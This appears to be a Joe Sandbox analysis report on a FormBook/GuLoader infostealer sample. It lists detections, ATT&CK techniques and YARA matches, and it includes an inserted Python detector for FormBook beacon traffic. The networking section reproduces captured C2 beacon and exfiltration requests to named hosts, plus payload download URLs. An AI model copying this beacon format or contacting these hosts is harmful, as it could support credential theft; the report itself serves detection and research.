

Analysis Report ___ __ ___.bin

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 221188
Start date: 08.04.2020
Start time: 15:07:02
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 16m 26s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: ___ __ ___.bin (renamed file extension from bin to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@27/13@19/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 33.3% (good quality ratio 30.5%)
  • Quality average: 71.8%
  • Quality standard deviation: 30%
HCA Information:
  • Successful, ratio: 94%
  • Number of executed functions: 171
  • Number of non-executed functions: 144
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12
  • Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, odc-web-brs.onedrive.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-dm-files-geo.onedrive.akadns.net, odc-dm-files-brs.onedrive.akadns.net, odc-dm-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy    Score   Range     Reporting   Whitelisted   Threat              Detection
Threshold   100     0 - 100               false         FormBook GuLoader   malicious

Confidence

Strategy    Score   Range     Further Analysis Required?   Confidence
Threshold   5       0 - 5     false                        (chart not captured)


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox did not find any clickable buttons; additional UI automation may extend the observed behavior.
Sample tries to load a library that is not present or installed on the analysis machine; adding the library might reveal more behavior.



Mitre Att&ck Matrix

Techniques the report mapped for this sample, grouped by tactic. The number after each technique is the count of matching signatures; matrix cells without a count are the standard ATT&CK padding of the Joe Sandbox matrix and are omitted here.
  • Initial Access: none
  • Execution: Scripting 11, Execution through Module Load 1, Graphical User Interface 1, Command-Line Interface 1
  • Persistence: Registry Run Keys / Startup Folder 21
  • Privilege Escalation: Process Injection 512
  • Defense Evasion: Process Injection 512, Virtualization/Sandbox Evasion 13, Scripting 11, Obfuscated Files or Information 3, Masquerading 3, Software Packing 1, Disabling Security Tools 1, Deobfuscate/Decode Files or Information 1, DLL Side-Loading 1
  • Credential Access: Credential Dumping 1
  • Discovery: Security Software Discovery 23, Virtualization/Sandbox Evasion 13, System Information Discovery 3, File and Directory Discovery 2, Process Discovery 2, Query Registry 1, Remote System Discovery 1
  • Lateral Movement: Remote File Copy 1
  • Collection: Man in the Browser 1, Data from Local System 1, Email Collection 1
  • Exfiltration: Data Encrypted 1
  • Command and Control: Standard Non-Application Layer Protocol 3, Standard Application Layer Protocol 3, Remote File Copy 1, Standard Cryptographic Protocol 1
  • Network Effects, Remote Service Effects, Impact: none

Signature Overview



AV Detection:

Multi AV Scanner detection for submitted file
Source: ___ __ ___.exe | Virustotal: Detection: 20%
Source: ___ __ ___.exe | ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match | File source: 00000007.00000002.1159029290.00030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1133249944.00030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1133299264.00060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1439121827.006C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.1108604549.06460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1438365388.00030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.1410061454.00D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1162285538.1DB00000.00000040.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 15.1.IconCache-ze.exe.1df70000.1.unpack | Avira: Label: TR/Dropper.Gen
Source: 1.1.___ __ ___.exe.1da30000.1.unpack | Avira: Label: TR/Dropper.Gen
Source: 15.2.IconCache-ze.exe.13a0000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 1.2.___ __ ___.exe.1460000.1.unpack | Avira: Label: TR/Dropper.Gen

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4x nop then jmp 1EF67098h (7_2_1EF67072)
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4x nop then jmp 1EFEB9BEh (7_2_1EF545E6)
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4x nop then mov edi, edi (7_2_1EF5055C)
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4x nop then shl edi, 05h (17_2_1ED41E4C)
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4x nop then jmp 1ED77098h (17_2_1ED77072)
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4x nop then jmp 1EDFB9BEh (17_2_1ED645E6)

Networking:

HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /sa22/?4hllG4c0=9W++Sllu7asCPnt7c6bHhsH55K7Vj/VEi/un24Pfn90An80eS7zCOl8dh/5Lt5EUN1tCIA==&7nNh=t4YTida0vzmLbh HTTP/1.1 | Host: www.johnwolfesculpture.com | Connection: close | Data Raw: 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sa22/?4hllG4c0=COHCH7zZrV9rvmj1R6i27nEdgcs+lDhmU4bL/SPZGIMCDIh03pCouR0/1sz1fcAvGJ0DNA==&7nNh=t4YTida0vzmLbh&sql=1 HTTP/1.1 | Host: www.korrela.com | Connection: close | Data Raw: 00 00 00 00 00 00 | Data Ascii:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /sa22/?4hllG4c0=9W++Sllu7asCPnt7c6bHhsH55K7Vj/VEi/un24Pfn90An80eS7zCOl8dh/5Lt5EUN1tCIA==&7nNh=t4YTida0vzmLbh HTTP/1.1 | Host: www.johnwolfesculpture.com | Connection: close | Data Raw: 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sa22/?4hllG4c0=COHCH7zZrV9rvmj1R6i27nEdgcs+lDhmU4bL/SPZGIMCDIh03pCouR0/1sz1fcAvGJ0DNA==&7nNh=t4YTida0vzmLbh&sql=1 HTTP/1.1 | Host: www.korrela.com | Connection: close | Data Raw: 00 00 00 00 00 00 | Data Ascii:
Found strings which match to known social media urls
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
Posts data to webserver
Source: unknown | HTTP traffic detected: POST /sa22/ HTTP/1.1 | Host: www.korrela.com | Connection: close | Content-Length: 205614 | Cache-Control: no-cache | Origin: http://www.korrela.com | User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.korrela.com/sa22/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: 34 68 6c 6c 47 34 63 30 3d 4b 73 4c 34 5a 63 58 56 70 79 46 73 6e 78 44 70 63 63 32 68 70 54 30 6e 67 70 51 49 79 52 31 55 4f 50 71 66 35 69 28 35 52 6f 55 43 47 49 70 4e 30 34 4f 41 36 42 64 54 70 38 54 75 54 39 77 75 48 5a 34 36 4f 70 78 4e 61 36 6b 4b 6e 41 53 4c 4e 6f 74 6d 34 74 45 31 67 46 38 33 39 75 52 31 76 66 54 6f 34 77 44 52 44 79 4d 64 6e 53 74 66 30 33 58 63 6c 4b 79 31 34 68 74 7a 49 47 59 54 6d 56 76 69 6b 5f 4a 37 72 51 47 32 52 77 58 38 4a 58 28 41 78 58 79 31 73 5f 32 4d 54 49 53 47 50 51 64 50 34 7a 72 7a 54 5f 48 59 30 74 6c 7a 69 62 6a 6d 4a 7a 77 49 50 64 33 5f 49 50 52 56 33 70 31 34 59 56 63 39 4c 68 57 66 6f 78 67 47 6d 74 32 47 42 52 77 58 6e 76 54 46 61 43 45 63 79 6c 39 55 7e 65 28 31 43 73 4c 44 38 43 61 4e 74 52 69 71 68 70 66 6b 64 46 76 6e 4f 77 35 58 4f 75 64 77 50 54 59 41 51 65 6a 54 65 55 59 57 69 71 78 37 64 6b 43 5a 71 42 42 79 54 54 43 33 6f 44 42 62 42 33 6a 59 6a 48 53 71 48 4f 7e 6a 53 6c 7a 50 4c 46 67 33 7a 4e 73 44 4d 69 38 58 71 69 68 37 7a 74 38 49 36 6e 68 55 49 56 44 58 78 6d 52 35 4d 48 36 55 71 30 77 4b 6c 54 70 2d 6f 7a 65 66 70 4c 65 6a 56 69 43 70 6b 63 4b 61 74 47 46 37 38 38 6d 74 70 53 39 53 51 2d 4b 42 6f 6e 36 4d 47 4f 55 61 70 6d 34 73 57 34 68 31 76 6e 5a 44 79 43 33 32 54 4f 39 71 79 38 71 39 37 4c 73 34 41 77 32 6c 75 30 51 46 74 7a 47 57 42 2d 77 69 65 38 38 42 36 7a 50 31 48 6d 53 5f 4f 31 38 43 76 56 30 2d 65 35 33 37 57 73 52 5f 66 63 78 33 4e 48 30 54 50 55 55 70 30 31 72 71 72 31 43 53 64 72 4c 71 4d 59 30 74 56 72 4f 63 41 6f 6d 79 38 72 76 53 73 4a 50 51 75 72 61 77 63 77 6a 54 6b 30 69 66 75 48 58 4f 
58 4e 44 39 30 41 34 6c 54 72 6b 31 74 31 36 43 7a 4a 74 76 48 39 5a 4d 58 2d 77 43 4d 58 62 51 52 56 51 49 31 4f 4e 7a 6c 46 65 37 79 4f 55 47 32 2d 70 74 35 77 4f 33 79 66 63 52 34 64 37 65 37 73 46 67 4f 62 53 7a 28 55 73 33 36 70 43 53 56 74 6d 4a 39 6c 30 4d 62 50 68 45 55 71 28 58 54 46 45 57 59 67 30 70 51 78 58 33 64 46 7e 55 73 72 71 75 4b 70 66 61 49 75 77 31 4e 79 77 47 72 62 75 4e 7a 74 28 44 6e 56 54 74 41 33 61 69 51 79 56 7a 62 70 31 31 47 42 36 45 57 55 46 54 58 79 50 36 62 5f 70 67 73 46 35 47 71 54 70 7a 79 52 68 4b 64 39 7a 71 4c 59 47 65 41 77 54 30 4c 7a 66 39 4a 6d 28 72 4e 31 49 6e 7e 7a 76 4d 71 61 4d 2d 66 71 30 32 41 52 76 32 35 67 30 4d 79 6f 33 54 67 5f 51 53 44 65 49 39 56 71 7e 69 48 4b 67 7a 54 41 4c 71 67 66 4e 34 73 6e 31 39 32 6c 50 47 58 76 51 41 44 6f 38 44 34 62 4d 4e 52 5f 6a 52 65 4e 38 77 71 39 4b 64 4e 39 69 59 32 69 79 68 67 56 50 77 57 70 55 6c 6a 42 75 6f 38 56 46 77 75 63 28 32 61 59 72 49 77 4c 6b 5a 38 62 6e 58 6e 69 61 49 64 4f 79 4f 42 43 32 6e 34 6e
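The two GET beacons and the POST above share the FormBook C2 shape: a short directory path (/sa22/), a first query parameter carrying a long base64-like blob, no User-Agent on the GET, a six-NUL-byte body, and a form POST whose body starts with the same parameter name (the captured Data Raw prefix 34 68 6c 6c 47 34 63 30 3d decodes to 4hllG4c0=). The following Python is an added example, not part of the Joe Sandbox report, that turns those traits into a detection over request records. The request records are constructed from the evidence above (the POST body is truncated to the captured prefix plus a short placeholder); the benign request, the thresholds and the record field names are this example's assumptions.

```python
"""Heuristic detection of FormBook-style HTTP beacons over request records.

Added example; not part of the Joe Sandbox report.  Sample requests are
constructed from the Networking evidence (hosts, path, parameter names,
captured body prefix); thresholds, field names and the benign request
are assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# "Data Raw" prefix of the POST as printed in the report; decodes to "4hllG4c0=",
# i.e. the POST body is keyed by the same name as the GET query.
POST_BODY_PREFIX_HEX = "34 68 6c 6c 47 34 63 30 3d"

# Standard base64 plus the '(' '_' '~' '-' characters seen in the captured POST body.
BLOB_RE = re.compile(r"[A-Za-z0-9+/=()_~\-]{40,}")
PATH_RE = re.compile(r"/[A-Za-z0-9]{2,8}/")      # FormBook uses a short directory token


@dataclass
class Request:
    method: str
    host: str
    path: str                       # path without query
    query: str = ""                 # raw query string, not URL-decoded
    headers: Dict[str, str] = field(default_factory=dict)
    body: bytes = b""


def split_params(raw: str) -> List[Tuple[str, str]]:
    """Split a query/body string on '&' and '=' without decoding '+' to space."""
    out = []
    for item in raw.split("&"):
        if item:
            key, _, val = item.partition("=")
            out.append((key, val))
    return out


def beacon_reasons(req: Request) -> List[str]:
    """Return the heuristic reasons why this request looks like a FormBook beacon."""
    reasons: List[str] = []
    if not PATH_RE.fullmatch(req.path):
        return reasons
    hdr = {k.lower(): v for k, v in req.headers.items()}
    if req.method == "GET":
        params = split_params(req.query)
        if "user-agent" not in hdr:
            reasons.append("GET without User-Agent")
        if len(params) >= 2 and BLOB_RE.fullmatch(params[0][1]):
            reasons.append("first query parameter %s is a long base64-like blob" % params[0][0])
        if req.body == b"\x00" * 6:
            reasons.append("GET body is six NUL bytes")
    elif req.method == "POST":
        params = split_params(req.body.decode("latin-1"))
        if (hdr.get("content-type", "").startswith("application/x-www-form-urlencoded")
                and params and BLOB_RE.fullmatch(params[0][1])):
            reasons.append("form POST keyed by %s with base64-like payload" % params[0][0])
        if hdr.get("referer", "").endswith(req.path) and hdr.get("origin", "").endswith(req.host):
            reasons.append("Referer/Origin point back at the C2 path")
    return reasons


def campaign_key(req: Request) -> Optional[str]:
    """First parameter name (GET query or POST body); FormBook keeps it fixed per build."""
    raw = req.query if req.method == "GET" else req.body.decode("latin-1")
    params = split_params(raw)
    return params[0][0] if params else None


def correlate(requests: List[Request]) -> Dict[str, Set[str]]:
    """Group beaconing hosts by shared parameter name; one key across hosts ties them together."""
    groups: Dict[str, Set[str]] = {}
    for r in requests:
        key = campaign_key(r) if beacon_reasons(r) else None
        if key:
            groups.setdefault(key, set()).add(r.host)
    return groups


# Constructed sample traffic based on the report; the POST body is the captured
# prefix plus a placeholder, the last request is an assumed benign one for contrast.
SAMPLE = [
    Request("GET", "www.johnwolfesculpture.com", "/sa22/",
            "4hllG4c0=9W++Sllu7asCPnt7c6bHhsH55K7Vj/VEi/un24Pfn90An80eS7zCOl8dh/5Lt5EUN1tCIA==&7nNh=t4YTida0vzmLbh",
            {"Host": "www.johnwolfesculpture.com", "Connection": "close"}, b"\x00" * 6),
    Request("GET", "www.korrela.com", "/sa22/",
            "4hllG4c0=COHCH7zZrV9rvmj1R6i27nEdgcs+lDhmU4bL/SPZGIMCDIh03pCouR0/1sz1fcAvGJ0DNA==&7nNh=t4YTida0vzmLbh&sql=1",
            {"Host": "www.korrela.com", "Connection": "close"}, b"\x00" * 6),
    Request("POST", "www.korrela.com", "/sa22/", "",
            {"Host": "www.korrela.com", "Content-Type": "application/x-www-form-urlencoded",
             "Origin": "http://www.korrela.com", "Referer": "http://www.korrela.com/sa22/",
             "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"},
            bytes.fromhex(POST_BODY_PREFIX_HEX.replace(" ", ""))
            + b"KsL4ZcXVpyFsnxDpcc2hpT0ngpQIyR1UOPqf5i(5RoUCGIpN04OA6BdTp8"),
    Request("GET", "www.example.com", "/index.html", "q=1",
            {"Host": "www.example.com", "User-Agent": "Mozilla/5.0"}),
]

if __name__ == "__main__":
    for r in SAMPLE:
        print(r.method, r.host, beacon_reasons(r))
    print(correlate(SAMPLE))
```

Correlating on the parameter name rather than on the host is the useful pivot: FormBook beacons to several domains from one embedded list with the same key, which is exactly how www.johnwolfesculpture.com and www.korrela.com end up grouped together here.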
Urls found in memory or binary data
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp | String found in binary or memory: http://crl.use:
Source: filename1.exe, 00000005.00000002.1133998962.00380000.00000004.00000001.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: filename1.exe, 00000005.00000002.1133998962.00380000.00000004.00000001.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: filename1.exe, 00000005.00000002.1133998962.00380000.00000004.00000001.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 00000008.00000000.1099532414.03A10000.00000008.00000001.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000000.1094514514.01ED0000.00000008.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: msiexec.exe, 0000000A.00000003.1406418600.02730000.00000004.00000001.sdmp | String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1162524004.1E960000.00000004.00000001.sdmp | String found in binary or memory: https://hmhxvw.dm.files.1drv.com/
Source: filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: https://hmhxvw.dm.files.1drv.com/_uGU
Source: filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: https://hmhxvw.dm.files.1drv.com/iuGU
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp | String found in binary or memory: https://hmhxvw.dm.files.1drv.com/y4mAymrJf7IYgOPTMcPi41l7VVW4reXsUzeWk4GGUou_YzD01AFJEaZ7ABDYRMDGPyt
Source: filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438508200.002B9000.00000004.00000020.sdmp | String found in binary or memory: https://hmhxvw.dm.files.1drv.com/y4mEr9yH-7ZhFAs2uIfcjGadw4DGbDySo2uw6humDzXMDq7iXT0aM0o4AD9ipAnxEae
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000005.00000002.1134830566.00669000.00000004.00000020.sdmp | String found in binary or memory: https://hmhxvw.dm.files.1drv.com/y4mWwNJZbf4oaC_H7wnwZA-YVmc5AReGkKXkUEvZkWkVTWZIoh8T0hIhbHq0o3SR8zp
Source: filename1.exe, 00000007.00000002.1162524004.1E960000.00000004.00000001.sdmp | String found in binary or memory: https://hmhxvw.dm.files.1drv.com/y4mjC0TasxG1CU0TWh2nSpMfrTbhENVZK9AmoCbn0tqjuMrPXMqk3OLxNyIPRG_vKIv
Source: filename1.exe, 00000005.00000002.1134830566.00669000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159547568.00329000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438508200.002B9000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/
Source: filename1.exe, 00000007.00000002.1159547568.00329000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/3
Source: filename1.exe, 00000011.00000003.1391201051.002D7000.00000004.00000001.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=569F732A389E1EA2&resid=569F732A389E1EA2%21411&authkey=ABTtM_3
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: filename1.exe, 00000005.00000002.1133998962.00380000.00000004.00000001.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp | String found in binary or memory: https://www.digicert.com/CPS0

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000007.00000002.1159029290.00030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1133249944.00030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1133299264.00060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1439121827.006C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.1108604549.06460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1438365388.00030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.1410061454.00D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1162285538.1DB00000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000013.00000002.1409626473.003DF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000007.00000002.1159029290.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.1159029290.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.1133249944.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.1133249944.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.1133299264.00060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.1133299264.00060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.1439121827.006C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.1439121827.006C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.1108604549.06460000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.1108604549.06460000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.1438365388.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.1438365388.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.1410061454.00D60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.1410061454.00D60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.1162285538.1DB00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.1162285538.1DB00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
